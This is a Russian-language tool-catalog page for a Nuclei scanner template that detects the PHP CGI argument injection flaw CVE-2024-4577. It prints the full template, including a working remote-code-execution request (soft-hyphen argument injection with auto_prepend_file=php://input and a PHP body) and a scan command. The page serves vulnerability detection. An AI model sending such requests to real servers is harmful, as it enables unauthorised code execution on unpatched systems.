Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-4577-Nuclei-Template — Шаблон Nuclei для обнаружения уязвимости внедрения аргументов PHP CGI CVE-2024-4577, позволяющий проводить автоматическое тестирование RCE с помощью специально подготовленных HTTP-запросов и сопоставления ответов. | Kitploit
Инструменты/GitHubGitHub/huseyinstif/cve-2024-4577-nuclei-template
Сканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubhuseyinstif/cve-2024-4577-nuclei-template

CVE-2024-4577-Nuclei-Template

Шаблон Nuclei для обнаружения уязвимости внедрения аргументов PHP CGI CVE-2024-4577, позволяющий проводить автоматическое тестирование RCE с помощью специально подготовленных HTTP-запросов и сопоставления ответов.

Репозиторий
22242 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-4577 Nuclei Template

Этот репозиторий содержит шаблон Nuclei для обнаружения уязвимости внедрения аргументов PHP CGI, известной как CVE-2024-4577.

Детали шаблона

root@kitploit:~
id: CVE-2024-4577

info:
  name: CVE-2024-4577 PHP CGI Argument Injection
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-4577 Уязвимость внедрения аргументов PHP CGI.
    Этот шаблон проверяет, содержит ли ответ "CVE_2024_4577_TEST", что указывает на успешное внедрение.
  tags: cve,cve2024,php,cgi,rce,cve2024-4577

http:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      
    headers:
      User-Agent: "curl/8.3.0"
      Accept: "*/*"
      Content-Type: "application/x-www-form-urlencoded"
      Connection: "keep-alive"
    body: |
      <?php echo md5("CVE_2024_4577_TEST"); ?>
    matchers:
      - type: word
        part: body
        words:
          - "83946a388fdf6cd2707eed8550575a76"

Использование

Чтобы использовать этот шаблон с Nuclei, сохраните содержимое шаблона в файл с именем CVE-2024-4577.yaml и выполните следующую команду:

root@kitploit:~
nuclei -t CVE-2024-4577.yaml -u <target-url>

Замените <target-url> на URL цели, которую вы хотите просканировать.

Контакты

По любым вопросам или за дополнительной информацией вы можете связаться со мной через:

  • LinkedIn
  • Twitter
Скачать инструмент